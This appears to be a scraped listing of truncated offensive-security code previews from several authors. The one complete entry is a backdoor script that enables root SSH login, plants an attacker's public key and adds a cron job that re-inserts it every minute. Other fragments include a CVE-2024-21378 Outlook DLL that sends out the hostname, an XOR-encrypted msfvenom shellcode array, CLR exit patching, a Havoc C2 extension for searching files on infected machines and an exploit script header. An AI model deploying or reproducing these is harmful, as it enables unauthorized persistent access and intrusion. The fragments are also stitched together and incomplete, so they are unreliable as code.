Homer28

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

grahamhelton

# Ensure that the target has cron running!
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart
EOF

chmod +x /tmp/ssh.sh

# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there.
echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh

WKL-Sec

// White Knight Labs - Offensive Development
// Inline Assembly - Get Function Address

#include <iostream>
#include <windows.h>

// Function definition
void* GetFunctionAddress(const char* functionName) {
    void* getFunctionAddr = nullptr;

nullenc0de

#!/bin/bash

apt install golang -y
GOROOT="/usr/local/go"
PATH="${PATH}:${GOROOT}/bin"
GOPATH=$HOME/go
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin"

go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest

odzhan

//
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Based on :
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;)

rxwx

#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"

/**
 * For the debug build we want:

OtterHacker

unsigned long hash_string(void* buffer, unsigned long size, char* extension){
    unsigned char current = 0;
    unsigned long hash = 0;
    unsigned char* currentChar = NULL;
    hash = 1337;
    currentChar = (void*)buffer;
    hash++;

    while(1){
        current = *currentChar;

dadevel

#include <cstdint>

// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"

p4p1

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Made by papi
# Created on: Di 10 Okt 2023 01:54:42  CEST
# auto_suite.py
# Description:
#  A havoc extention to search for files inside of infected agents
# Usage:
#  To use this script save it on your machine and add it to the script manager of Havoc
#  inside of: Scripts > Scripts Manager > Load Script

two06

#!/usr/bin/python3
import requests
import sys
import uuid
from requests.packages.urllib3.exceptions import InsecureRequestWarning

#Disable annoying warnings about using burp proxy. 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

http_proxy  = "http://127.0.0.1:8080"